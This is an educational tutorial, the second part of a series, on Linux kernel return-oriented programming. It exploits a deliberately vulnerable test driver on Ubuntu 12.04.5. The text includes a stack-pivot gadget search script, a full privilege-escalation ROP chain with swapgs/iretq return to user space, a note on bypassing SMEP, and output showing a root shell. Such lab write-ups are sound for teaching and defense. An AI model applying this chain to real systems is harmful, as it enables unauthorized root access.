Linux Kernel ROP - Ropping your way to # (Part 2)

Introduction

In Part 1 of this tutorial, we have demonstrated how to find useful ROP gadgets and build a privilege escalation ROP chain for our test system (3.13.0-32 kernel - Ubuntu 12.04.5 LTS). We have also developed a vulnerable kernel driver that allowed arbitrary code execution. In this part, we will use this kernel module to demonstrate the ROP chain in practice: escalate privileges, fixate the system and perform a clean "exit" to user space.

The following is a list of requirements for the ROP chain from Part 1:

Execute a privilege escalation payload

Data residing in user space may be referenced (i.e., "fetching" data from user space is allowed)

Instructions residing in user space may not be executed

The vulnerable kernel module demonstrated in Part 1 allowed setting a function pointer to an arbitrary memory address due to the missing offset bound checks. Our simple trigger code is shown below for reference:

#define DEVICE_PATH "/dev/vulndrv" ... int main(int argc, char **argv) { int fd; struct drv_req req; req.offset = atoll(argv[1]); fd = open(DEVICE_PATH, O_RDONLY); if (fd == -1) { perror("open"); } ioctl(fd, 0, &req;); return 0; }

In the code snippet above, we control the request offset value which is declared as unsigned long in our vulnerable kernel module. Using this offset value, we can reference any kernel or user-space memory address.

Stack Pivot

Since we cannot redirect kernel control flow to a user-space address, we need to look for a suitable gadget in kernel space. The idea is to prepare our ROP chain in user space and then set the stack pointer to the beginning of this ROP chain. That way, we are not executing instructions residing in user space directly but rather fetching pointers from user space to instructions in kernel space.

Setting the breakpoint at the entry point to our vulnerable function device_ioctl() , we can examine registers that are either 'static' (have a somewhat fixed value between device_ioctl() invocations) or registers that we control before dereferencing the function pointer:

0xffffffffa013d0bd <device_ioctl> nopl 0x0(%rax,%rax,1) 0xffffffffa013d0c2 <device_ioctl+5> push %rbp 0xffffffffa013d0c3 <device_ioctl+6> mov %rsp,%rbp 0xffffffffa013d0c6 <device_ioctl+9> sub $0x30,%rsp 0xffffffffa013d0ca <device_ioctl+13> mov %rdi,-0x18(%rbp) 0xffffffffa013d0ce <device_ioctl+17> mov %esi,-0x1c(%rbp) 0xffffffffa013d0d1 <device_ioctl+20> mov %rdx,-0x28(%rbp) [user-space address of passed req struct] 0xffffffffa013d0d5 <device_ioctl+24> mov -0x1c(%rbp),%eax 0xffffffffa013d0d8 <device_ioctl+27> test %eax,%eax 0xffffffffa013d0da <device_ioctl+29> jne 0xffffffffa013d145 <device_ioctl+136> 0xffffffffa013d0dc <device_ioctl+31> mov -0x28(%rbp),%rax 0xffffffffa013d0e0 <device_ioctl+35> mov %rax,-0x10(%rbp) [save req struct address to -0x10(%rbp)] 0xffffffffa013d0e4 <device_ioctl+39> mov -0x10(%rbp),%rax 0xffffffffa013d0e8 <device_ioctl+43> mov (%rax),%rax 0xffffffffa013d0eb <device_ioctl+46> mov %rax,%rsi 0xffffffffa013d0ee <device_ioctl+49> mov $0xffffffffa013e066,%rdi 0xffffffffa013d0f5 <device_ioctl+56> mov $0x0,%eax 0xffffffffa013d0fa <device_ioctl+61> callq 0xffffffff81746ca3 0xffffffffa013d0ff <device_ioctl+66> mov -0x10(%rbp),%rax 0xffffffffa013d103 <device_ioctl+70> mov (%rax),%rax 0xffffffffa013d106 <device_ioctl+73> shl $0x3,%rax 0xffffffffa013d10a <device_ioctl+77> add $0xffffffffa013f340,%rax 0xffffffffa013d110 <device_ioctl+83> mov %rax,%rsi 0xffffffffa013d113 <device_ioctl+86> mov $0xffffffffa013e074,%rdi 0xffffffffa013d11a <device_ioctl+93> mov $0x0,%eax 0xffffffffa013d11f <device_ioctl+98> callq 0xffffffff81746ca3 0xffffffffa013d124 <device_ioctl+103> mov $0xffffffffa013f340,%rdx mov -0x10(%rbp),%rax mov (%rax),%rax 0xffffffffa013d132 <device_ioctl+117> shl $0x3,%rax 0xffffffffa013d136 <device_ioctl+121> add %rdx,%rax mov %rax,-0x8(%rbp) 0xffffffffa013d13d <device_ioctl+128> mov -0x8(%rbp),%rax 0xffffffffa013d141 <device_ioctl+132> callq *%rax jmp 0xffffffffa013d146 <device_ioctl+137> 0xffffffffa013d145 <device_ioctl+136> nop 0xffffffffa013d146 <device_ioctl+137> mov $0x0,%eax 0xffffffffa013d14b <device_ioctl+142> leaveq 0xffffffffa013d14c <device_ioctl+143> retq

In [1], the $rax register contains the address of the instruction to be executed. We can compute this address in advance since we know both the ops array base address and the passed offset value used to compute the address of the function pointer fn() . For example, given the ops base address 0xffffffffaaaaaaaf and offset = 0x6806288 , the fn address becomes 0xffffffffdeadbeef .

We can reverse this logic and try to find the offset value that would give us the desired target address to execute in kernel space. There are many stack pivot gadgets. For example, the following are common stack pivots encountered in user-space ROP chains:

mov %rsp, %rXx ; ret

add %rsp, ...; ret

xchg %rXx, %rsp ; ret

Using arbitrary code execution in kernel space, we need to set our stack pointer to a user-space address that we control. Even though our test environment is 64-bit, we're interested in the last stack pivot gadget but with 32-bit registers, i.e., xchg %eXx, %esp ; ret or xchg %esp, %eXx ; ret . In case our $rXx contains a valid kernel memory address (e.g., 0xffffffffXXXXXXXX), this stack pivot instruction will set the lower 32 bits of $rXx (0xXXXXXXXX which is a user-space address) as the new stack pointer. Since the $rax value is known right before executing fn() , we know exactly where our new user-space stack will be and mmap it accordingly.

Using the ROPGadget tool from Part 1, we can see that there are many suitable xchg stack pivots in the kernel image:

0xffffffff81000085 : xchg eax, esp ; ret 0xffffffff81576254 : xchg eax, esp ; ret 0x103d 0xffffffff810242a6 : xchg eax, esp ; ret 0x10a8 0xffffffff8108e258 : xchg eax, esp ; ret 0x11e8 0xffffffff81762182 : xchg eax, esp ; ret 0x12eb 0xffffffff816f4a04 : xchg eax, esp ; ret 0x13e9 0xffffffff81a196fc : xchg eax, esp ; ret 0x1408 0xffffffff814bd0fd : xchg eax, esp ; ret 0x148 0xffffffff8119e39b : xchg eax, esp ; ret 0x148d 0xffffffff813f8ce5 : xchg eax, esp ; ret 0x14c 0xffffffff810db968 : xchg eax, esp ; ret 0x14ff 0xffffffff81d5953e : xchg eax, esp ; ret 0x1589 0xffffffff81951aee : xchg eax, esp ; ret 0x1d07 0xffffffff81703efe : xchg eax, esp ; ret 0x1f3c ...

The only caveat when choosing a stack pivot gadget is that it needs to be aligned by 8 bytes (since the ops is the array of 8 byte pointers and its base address is properly aligned). The following simple script can be used to find a suitable gadget:

==================== find_offset.py ==================== #!/usr/bin/env python import sys base_addr = int(sys.argv[1], 16) f = open(sys.argv[2], 'r') # gadgets for line in f.readlines(): target_str, gadget = line.split(':') target_addr = int(target_str, 16) # check alignment if target_addr % 8 != 0: continue offset = (target_addr - base_addr) / 8 print 'offset =', (1 << 64) + offset print 'gadget =', gadget.strip() print 'stack addr = %x' % (target_addr & 0xffffffff) break ======================================================== vnik@ubuntu:~$ cat ropgadget | grep ': xchg eax, esp ; ret' > gadgets vnik@ubuntu:~$ ./find_offset.py 0xffffffffa0224340 ./gadgets offset = 18446744073644332003 gadget = xchg eax, esp ; ret 0x11e8 stack addr = 8108e258

The stack address above represents the user-space address where the ROP chain needs to mmaped ( fake_stack ):

unsigned long *fake_stack; mmap_addr = stack_addr & 0xfffff000; assert((mapped = mmap((void*)mmap_addr, 0x2000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)mmap_addr); fake_stack = (unsigned long *)(stack_addr); *fake_stack ++= 0xffffffff810c9ebdUL; /* pop %rdi; ret */ fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);

The ret instruction in the chosen stack pivot has a numeric operand. The ret instruction with no argument pops the return address off the stack and jumps to it. However, in some calling conventions (e.g., Microsoft __stdcall), the callee function is responsible for cleaning up the stack. In this case, the ret is called with an operand that represents the number of bytes to pop off the stack after fetching the next instruction. Hence, the second ROP gadget after the stack pivot is positioned at the offset 0x11e8 + 8 : once the stack pivot is executed, the control will be transferred to the next gadget but the stack pointer will be at $rsp + 0x11e8 .

Payload

Referring to the stack layout from Part 1, we can prepare the ROP chain in user space as follows:

fake_stack = (unsigned long *)(stack_addr); *fake_stack ++= 0xffffffff810c9ebdUL; /* pop %rdi; ret */ fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8); *fake_stack ++= 0x0UL; /* NULL */ *fake_stack ++= 0xffffffff81095430UL; /* prepare_kernel_cred() */ *fake_stack ++= 0xffffffff810dc796UL; /* pop %rdx; ret */ //*fake_stack ++= 0xffffffff81095190UL; /* commit_creds() */ *fake_stack ++= 0xffffffff81095196UL; /* commit_creds() + 2 instructions */ *fake_stack ++= 0xffffffff81036b70UL; /* mov %rax, %rdi; call %rdx */

We've made some modifications to the ROP chain from Part 1. In particular, the commit_creds() address was shifted by 2 instructions. The reason for this is that we're using the call instruction to execute commit_creds() . The call instruction saves the return address on the stack prior to transferring control to the first instruction of commit_creds() . As any other function, commit_creds has prologue and epilogue that will push values on the stack and then pop them off the stack before returning. Hence, once the function is executed, the control will be transferred to the saved return address. We, however, want to transfer it to the next gadget in the ROP chain. To use the call instruction as the ROP gadget, we can simply skip one of the push instructions in the prologue:

(gdb) x/10i 0xffffffff81095190 0xffffffff81095190 nopl 0x0(%rax,%rax,1) 0xffffffff81095195 push %rbp 0xffffffff81095196 mov %rsp,%rbp 0xffffffff81095199 push %r13 0xffffffff8109519b mov %gs:0xc7c0,%r13 0xffffffff810951a4 push %r12 0xffffffff810951a6 push %rbx 0xffffffff810951a7 mov %rdi,%rbx 0xffffffff810951aa sub $0x8,%rsp 0xffffffff810951ae mov 0x498(%r13),%r12

Skipping push $rbp (and the first nop) allows as to use the call instruction as the ROP gadget: the saved return address on the stack will be popped by commit_creds() epilogue and ret will transfer control to the next gadget in the chain.

Fixating

The ROP chain described above will give our calling process superuser privileges. However, once all ROP gadgets are executed, the control will be transferred to the next instruction on the stack which is some uninitialised memory value. We need to somehow restore the stack pointer and transfer control back to our user-space process.

You might be aware that syscalls switch kernel/user space context all the time. Once the process executes a syscall, it needs to restore its state so that it can continue executing from the next instruction after the syscall. This is typically done using the iret (inter-privilege return) instruction to return from kernel space back to the user-space process. However, iret (or iretq with 64-bit operands in our case) expects a certain stack layout shown below:



We would need to extend our ROP chain to include a new user-space instruction pointer (RIP), mmaped user-space stack pointer (RSP), code and stack segment selectors (CS and SS), and EFLAGS register with various state information. The CS, SS and EFLAGS values can be obtained from the calling user-space process using the following save_state() function:

unsigned long user_cs, user_ss, user_rflags; static void save_state() { asm( "movq %%cs, %0

" "movq %%ss, %1

" "pushfq

" "popq %2

" : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory"); }

The address of the iretq instruction in the kernel .text segment can be obtained using objdump :

vnik@ubuntu:~# objdump -j .text -d ~/vmlinux | grep iretq | head -1 ffffffff81053056: 48 cf iretq

The last thing to note is that before executing iret , swapgs is required on 64-bit systems. This instruction swaps the contents of the GS register with a value in one of the MSRs. At the entry to a kernel-space routine (e.g., a syscall), swpags is executed to obtain a pointer to kernel data structures and hence, a matching swapgs is required before returning to user space.

We can now put all the pieces of the ROP chain together:

save_state(); fake_stack = (unsigned long *)(stack_addr); *fake_stack ++= 0xffffffff810c9ebdUL; /* pop %rdi; ret */ fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8); *fake_stack ++= 0x0UL; /* NULL */ *fake_stack ++= 0xffffffff81095430UL; /* prepare_kernel_cred() */ *fake_stack ++= 0xffffffff810dc796UL; /* pop %rdx; ret */ *fake_stack ++= 0xffffffff81095196UL; /* commit_creds() + 2 instructions */ *fake_stack ++= 0xffffffff81036b70UL; /* mov %rax, %rdi; call %rdx */ *fake_stack ++= 0xffffffff81052804UL; /* swapgs ; pop rbp ; ret */ *fake_stack ++= 0xdeadbeefUL; /* dummy placeholder */ *fake_stack ++= 0xffffffff81053056UL; /* iretq */ *fake_stack ++= (unsigned long)shell; /* spawn a shell */ *fake_stack ++= user_cs; /* saved CS */ *fake_stack ++= user_rflags; /* saved EFLAGS */ *fake_stack ++= (unsigned long)(temp_stack+0x5000000); /* mmaped stack region in user space */ *fake_stack ++= user_ss; /* saved SS */

Results

The complete exploit for Ubuntu 12.04.5 (x64) can be found on GitHub. First, we need to obtain the array offset using the base address:

vnik@ubuntu:~$ dmesg | grep addr | grep ops [ 244.142035] addr(ops) = ffffffffa02e9340 vnik@ubuntu:~$ ~/find_offset.py ffffffffa02e9340 ~/gadgets offset = 18446744073644231139 gadget = xchg eax, esp ; ret 0x11e8 stack addr = 8108e258

Then, pass the base and offset addresses to the ROP exploit:

vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340 array base address = 0xffffffffa02e9340 stack address = 0x8108e258 # id uid=0(root) gid=0(root) groups=0(root) #

And did we mention that this would bypass SMEP? :) There are easier ways to bypass SMEP. For example, clearing the CR4 bit as a ROP chain gadget and then executing the rest of the privilege escalation payload (i.e., commit_creds(prepare_kernel_cred(0)) with iret ) in user space. The goal of this tutorial was not to bypass a certain protection mechanism but to demonstrate that kernel ROP (the entire payload) can be as easily executed in kernel space as ROP in user space. There are obvious downsides to kernel ROP: the main one is being able to obtain access to the kernel boot image (which defaults to 0600). This is not an issue for stock kernels but could be problematic for custom kernels if there are no other memory leaks.

If you have any comments, corrections or questions, you can post them below.